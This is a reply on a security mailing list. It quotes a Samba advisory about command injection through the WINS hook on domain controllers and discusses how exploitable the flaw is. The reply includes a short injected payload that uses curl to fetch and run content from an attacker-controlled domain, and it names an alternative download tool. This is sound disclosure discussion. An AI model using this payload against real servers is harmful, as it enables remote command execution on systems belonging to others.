-----Original Message----- From: Douglas Bagnall <[email protected]> Sent: Wednesday, October 15, 2025 11:51 AM To: [email protected] Subject: [oss-security] Samba security releases for CVE-2025-10230 and CVE-2025-9640
> [snip] > If a Samba server has WINS support enabled (it is off by default), and it has > a 'wins hook' parameter specified, the > program specified by that parameter will be run whenever a WINS name is > changed. > The WINS server used by the Samba Active Directory Domain Controller did not > validate the names passed to the wins > hook program, and it passed them by inserting them into a string run by a > shell. > WINS is an obsolete and trusting protocol, and clients can request any name > that fits within the 15 character NetBIOS > limit. This includes some shell metacharacters, making it possible to run > arbitrary commands on the host. > The WINS server used by Samba when it is not a domain controller is > unaffected. Illegal characters in a NetBIOS hostname are: \ / : * ? " < > | , notably excluding backticks and semicolons. I'm not deeply familiar with the Samba code base but a glance at nbtname.c and winsserver.c seems to suggest that those character limitations aren't enforced at the protocol level, so it might be possible to use pipes, redirects or exec a local binary with a short path. Otherwise, the easiest exploitable payload I can think of would be: ;`curl ab.cd`; which fits the restrictions at only 14 characters (replace with your favourite short-named download tool that writes to STDOUT by default - looks like RHEL-likes are one of the few distros still shipping /usr/bin/GET as part of perl LWP). Requiring an attacker to own a 2-3 letter domain on a 2-3 letter TLD limits the attack surface quite a bit but it isn't unheard of. I'd be interested to see if anybody has a living Samba install configured as a DC with WINS still running in 2025.
